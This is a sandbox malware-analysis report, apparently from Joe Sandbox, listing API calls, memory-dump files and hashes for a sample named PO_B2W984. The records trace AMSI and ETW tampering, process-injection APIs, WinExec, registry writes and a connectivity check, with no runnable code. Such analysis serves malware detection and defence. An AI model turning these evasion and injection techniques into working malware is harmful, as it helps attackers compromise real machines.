                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
• String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
• API String ID: 2481178504-1225450241
• Opcode ID: eaca3ff9a380ad1a89f624bd33a614495d6f1bd8de6db6d30ec67108fbfd3883
• Instruction ID: 8c35143d972335dac61c3c255c90d87bc5575e852beddf22c0a2654ae28a4a99
• Opcode Fuzzy Hash: eaca3ff9a380ad1a89f624bd33a614495d6f1bd8de6db6d30ec67108fbfd3883
• Instruction Fuzzy Hash: FE433179A405589FDB21FB64DD809DE73BAFF88300F1240E6E10AEB754DA709E858F64

Control-flow Graph (graph image omitted)
APIs
• Sleep.KERNEL32(00000000,?,02DD2000), ref: 02DD17D0
• Sleep.KERNEL32(0000000A,00000000,?,02DD2000), ref: 02DD17E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: Sleep
• String ID: 0`$2
• API String ID: 3472027048-3539502353
• Opcode ID: 3b2f8f9913c85ab9fb57c85fd085bf3c67da1bd894910d2637a234c7ccbbb3c3
• Instruction ID: 44d3bca820253f9c3002a5e4804f76c5aa7f6bd0d2d7ac8cd990550187175274
• Opcode Fuzzy Hash: 3b2f8f9913c85ab9fb57c85fd085bf3c67da1bd894910d2637a234c7ccbbb3c3
• Instruction Fuzzy Hash: BEB14572A80B618BD725CF29E880355BBE1EB84310F0D86AED54E8F385C770EC95CB90

Control-flow Graph (graph image omitted)
APIs
• Sleep.KERNEL32(00000000,?), ref: 02DD1B17
• Sleep.KERNEL32(0000000A,00000000,?), ref: 02DD1B31
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: Sleep
• String ID: 0`
• API String ID: 3472027048-3339448193
• Opcode ID: 8c7f08a0e1bfb254ef4fb845316ec23f3a65bca9dcad7c4289246d9b5d4dca67
• Instruction ID: d4622132f09903f02dcd302b39e0ca211c535eac1e6c90c2717a71f0fe8b9206
• Opcode Fuzzy Hash: 8c7f08a0e1bfb254ef4fb845316ec23f3a65bca9dcad7c4289246d9b5d4dca67
• Instruction Fuzzy Hash: B251FF71640B408FE725CF68D984766BBD1EB46314F1985AED44DCB382E7B0DC89CBA0

Control-flow Graph (graph image omitted)

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02DE870D
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
  • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DE876C
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 941070894-2671292670
• Opcode ID: 1a2bb198c1e861557d916074efe55d46dae0a7172fe47cb4875a4d49bcb87d9d
• Instruction ID: b326fb363068eb3407ccdc358dde2c86f9c78a90e3c52edf1c30a3378742fbdf
• Opcode Fuzzy Hash: 1a2bb198c1e861557d916074efe55d46dae0a7172fe47cb4875a4d49bcb87d9d
• Instruction Fuzzy Hash: F6F0AF5044C381B9E600F678DC45F4BBECD8B92224F048A48F1E99A3D2D679D5049BB7

Control-flow Graph (graph image omitted)

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DEE42E
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 0d1112403a76d79da4c386a01d78ac0b9d93596b48329f3b06c0096707633efb
• Instruction ID: b00065fd668c3480578a62708568ffded210970eac7b0dcde966411da90eac44
• Opcode Fuzzy Hash: 0d1112403a76d79da4c386a01d78ac0b9d93596b48329f3b06c0096707633efb
• Instruction Fuzzy Hash: 39413A35B50548ABEF11FBA4D881ADEB3FAEF48720F218426E042A7354DA74ED058F74

Control-flow Graph (graph image omitted)

APIs
• LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
• GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
  • Part of subcall function 02DE7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
• FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
• String ID:
• API String ID: 1543721669-0
• Opcode ID: e43f5fe3201f7c158b1685cda86377b131f3b4b5302c9852eef501cb8652cff4
• Instruction ID: 75b07e3b52e8774c781dbc668edcd6fb4babd2533e951a164d2f5d155814cc66
• Opcode Fuzzy Hash: e43f5fe3201f7c158b1685cda86377b131f3b4b5302c9852eef501cb8652cff4
• Instruction Fuzzy Hash: 98118470A80744ABEF00FBA5DC09A6E77ADDB45701F4244A8B509EBB90CA74DD458FA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02DE8470
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                                        • Opcode ID: 8eb927e98e72879fec56bb09da034cc8676f2bc5a7042ddbdf4f7befaa2bc7f6
                                                                                                                                        • Instruction ID: ccbd8014177464468e3a63d5e56ca22464b8acc33e9d436ac9b5abcc092788a5
                                                                                                                                        • Opcode Fuzzy Hash: 8eb927e98e72879fec56bb09da034cc8676f2bc5a7042ddbdf4f7befaa2bc7f6
                                                                                                                                        • Instruction Fuzzy Hash: 07018134680608BFEB11FFA5DC41B5A77EEEB48710F628460B505DBB50D674AD009E34
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02DE8470
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                                        • Opcode ID: 6390aaa83181d64ee60667ce079112b60088029d50da4abab1c8cd4ab6b4ab87
                                                                                                                                        • Instruction ID: 60f7dc89d6dfa94b81e0e328dd66c740386e61c73c23fce1e347695617445af0
                                                                                                                                        • Opcode Fuzzy Hash: 6390aaa83181d64ee60667ce079112b60088029d50da4abab1c8cd4ab6b4ab87
                                                                                                                                        • Instruction Fuzzy Hash: E8F08134680608AFEB11FFA5DC41B5A77AEEB48710F628460B505DBB50D674AD009E34
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DE5C08
                                                                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DE5C36
                                                                                                                                          • Part of subcall function 02DD7D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DE3880,02DE5C76,00000000,02DE5CF4,?,?,02DE3880), ref: 02DD7D5E
                                                                                                                                          • Part of subcall function 02DD7F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DE3880,02DE5C91,00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DD7F37
                                                                                                                                        • GetLastError.KERNEL32(00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DE5C9B
                                                                                                                                          • Part of subcall function 02DDA6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02DDC359,00000000,02DDC3B3), ref: 02DDA717
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 503785936-0
                                                                                                                                        • Opcode ID: df80bfd7a9ebdd114d6bf0bcb22105e729a5eb36dff786fa00afd3819a184277
                                                                                                                                        • Instruction ID: 2018db866ab716010897083e383d87027a5497c29bf7f0e11207d6503e7816b4
                                                                                                                                        • Opcode Fuzzy Hash: df80bfd7a9ebdd114d6bf0bcb22105e729a5eb36dff786fa00afd3819a184277
                                                                                                                                        • Instruction Fuzzy Hash: E9319F30A40A049FEB00EFA8D8807AEB7F6EB48304F908465E905AB380D7755D45CFB1
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02F25914), ref: 02DEE6FC
                                                                                                                                        • RegSetValueExA.ADVAPI32(00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE734
                                                                                                                                        • RegCloseKey.ADVAPI32(00000844,00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE73F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 779948276-0
                                                                                                                                        • Opcode ID: 7c92a73d65c7673e682fa558b2d978d90932175e341ff737498e8e7f30c00bd0
                                                                                                                                        • Instruction ID: 32ec6034680c4521fe2b9acea3b6c53c5b2bf9888d0e7eef69d05edda6b7dd67
                                                                                                                                        • Opcode Fuzzy Hash: 7c92a73d65c7673e682fa558b2d978d90932175e341ff737498e8e7f30c00bd0
                                                                                                                                        • Instruction Fuzzy Hash: 87113D71600A08AFEB10FBA9D891A6E77ADEB09360F814464F505E7350D730EE418EB0
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02F25914), ref: 02DEE6FC
                                                                                                                                        • RegSetValueExA.ADVAPI32(00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE734
                                                                                                                                        • RegCloseKey.ADVAPI32(00000844,00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE73F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 779948276-0
                                                                                                                                        • Opcode ID: 424f8d6bce7291b578b1bb315ad5e32ad0991008e2a4d1c1edf04cd867cc6e92
                                                                                                                                        • Instruction ID: 0c781d9e87bea57a3aed857e57d8d9c7d363b0a8d6f11970553071cac88cd039
                                                                                                                                        • Opcode Fuzzy Hash: 424f8d6bce7291b578b1bb315ad5e32ad0991008e2a4d1c1edf04cd867cc6e92
                                                                                                                                        • Instruction Fuzzy Hash: 91114F71600A08AFEB10FFA9D891A6E77ADEB09360F814464F505E7350D730EE418FB0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 319a171880cb51b4d504a2298baeab0a28f43c4b4003e2900ddedcf78809e13c
                                                                                                                                        • Instruction ID: 679de7402a67a4489d20109f245c633c8e922b51d31b5b2813abfba752493cc1
                                                                                                                                        • Opcode Fuzzy Hash: 319a171880cb51b4d504a2298baeab0a28f43c4b4003e2900ddedcf78809e13c
                                                                                                                                        • Instruction Fuzzy Hash: 98F0CD21708A14CBDB207B39CDC4A79279ADF01B06F941426E4CA9F305CB24EC49CBB2
                                                                                                                                        APIs
                                                                                                                                        • SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
                                                                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4D07
                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02DD4D19
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 986138563-0
                                                                                                                                        • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                        • Instruction ID: 52ac6262c28fc40a52ff9f5291a7f3d47138b4585d7d63bd35ba23e51927eda1
                                                                                                                                        • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                        • Instruction Fuzzy Hash: AAE012B8105A015EFB142F619C41F373B2AEFC2745F148899E804CA354D735CC41ED74
                                                                                                                                        APIs
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 02DE735A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeString
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 3341692771-2852464175
APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 02DDE701
  • Part of subcall function 02DDE2E4: VariantClear.OLEAUT32(?), ref: 02DDE2F3
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02DD1A03,?,02DD2000), ref: 02DD15E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
Similarity
• API ID: AllocVirtual
• String ID: 0`
• API String ID: 4275171209-3339448193
APIs
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,02DE6D39,?,?,?,00000000), ref: 02DE6D19
  • Part of subcall function 02DD4C0C: SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
APIs
• GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DD5832
  • Part of subcall function 02DD5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5A94
  • Part of subcall function 02DD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AB2
